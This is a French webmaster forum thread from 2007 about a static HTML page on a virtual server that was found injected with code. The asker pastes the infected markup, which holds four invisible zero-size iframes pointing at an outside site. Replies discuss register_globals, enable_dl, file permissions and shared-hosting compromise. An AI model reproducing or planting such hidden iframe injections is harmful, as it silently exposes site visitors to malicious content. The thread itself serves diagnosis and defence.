georges Posté 18 Janvier 2007 Posté 18 Janvier 2007 (modifié) bonjour, j'ai un gros doute sur la sécurité d'un serveur virtuel (VDS). La situation est la suivante : comment expliquer qu'une page contenant strictement du html et strictement aucune variable, ni code PHP initialement codé ainsi: <html><head><title>un titre</title></head><body><h1>un autre titre en h1</h1><ul><li>item</li><li>item</li><li>item</li><li>item</li></ul></body></html puisse se retrouver infecté avec : <html><head><title>un titre</title></head><body><h1>un autre titre en h1</h1><ul><li>item</li><li>item</li><li>item</li><li>item</li></ul></body></html<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html><html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html><html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html><html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html> Mon hébergeur prétend que c'est à cause du register_global à ON plutôt que à OFF mais je ne vois pas le rapport ni la pertinence d'une telle réponse dans cas précis... Le pire c'est que c'est la seule et unique page du site !!! Une idée ?? Modifié 18 Janvier 2007 par georges
Interdit Posté 18 Janvier 2007 Posté 18 Janvier 2007 (modifié) Ceci peut etre lié à de nombreux facteurs: scripts pas à jour donc avec des failles connues, serveur non sécurisé, répertoires en chmod 777, ... cela peut meme provenir d'un script malveillant sur ton pc. Ton hébergeur a sans doute raison, register globals doit etre off pour des raisons de sécurité, d'ailleurs cette option n'existera plus dans la future version de Php 6. Ceci peut etre lié aussi à enable_dl... Bonne recherche, Interdit Modifié 18 Janvier 2007 par Interdit
georges Posté 18 Janvier 2007 Auteur Posté 18 Janvier 2007 Merci Interdit de tes réponses. Effectivement, le enable_dl est ON. Pour le register_global, je suis OK avec toi sur les conséquences sur un script php mais de là à favoriser une injection de code dans une page en pur html, il y a un fossé, non ?
oueb Posté 29 Novembre 2007 Posté 29 Novembre 2007 Bonsoir Ce qu'il faudrait savoir c'est qu'il se pourrait que la faille de sécurité ne provienne pas forcement de là. Pour vous expliquer, je prendrais comme exemple une situation que je viens de rencontrer avec l'un de mes clients, celle de l'utilisation d'un simple serveur mutualisé. Vous êtes client ayant acquis un serveur mutualisé par exemple, vous hébergez uniquement des pages HTML sur votre espace. (Jusque là aucun risque de vous faire pirater "directement", croyez-vous...) Maintenant si un autre site web sur ce même serveur se fait pirater, et si le serveur mutualisé où vous êtes hébergé n'est pas très bien entretenu et configuré (sécurisé), on pourrait atteindre tous les clients (dont vous faites partie) sur le même serveur, allons jusqu'à pouvoir lire/modifier/supprimer sans problèmes sur les répértoires qui nous nous appartiennent pas. Pour résumer, on pourrait conclure qu'une faille de sécurité provient souvent de l'endroit où l'en se doute le moin. Bonne chance
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant